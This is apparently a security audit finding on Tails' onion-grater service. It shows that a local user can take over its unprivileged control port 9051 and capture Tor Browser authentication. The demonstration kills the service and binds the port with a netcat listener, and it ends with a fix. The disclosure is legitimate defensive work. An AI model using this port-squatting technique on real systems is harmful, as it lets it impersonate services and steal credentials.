MITM of onion-grater service
Since the onion-grater service runs on non-privileged ports, a local user may be able to bind his socket faster than the onion-grater service. As a result, an attacker may be able to forge messages or leak information.
The following shows an example (as root), just for demonstration purposes:
We see, that the port is already bound to a PID:
amnesia@amnesia:~/$ sudo netstat -tulpen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 0.0.0.0:9051 0.0.0.0:* LISTEN 0 20693 5297/python3
The port is bound by the
amnesia@amnesia:~/$ ps -aux | grep 5297 root 5297 0.5 0.4 656384 39748 ? Ssl Mar30 3:05 /usr/bin/python3 -u /usr/local/lib/onion-grater --listen-address 0.0.0.0
We kill the application as root and bind the Port as the low-privileged amnesia user.
sudo kill -9 5297 nc -lvp 9051
We start the TOR Browser with
/usr/local/lib/run-tor-browser-in-netns and get the following output:
Listening on 0.0.0.0 9051 Connection received on 10.200.1.2 53884 authenticate passwd
- Run all the services on higher privileged ports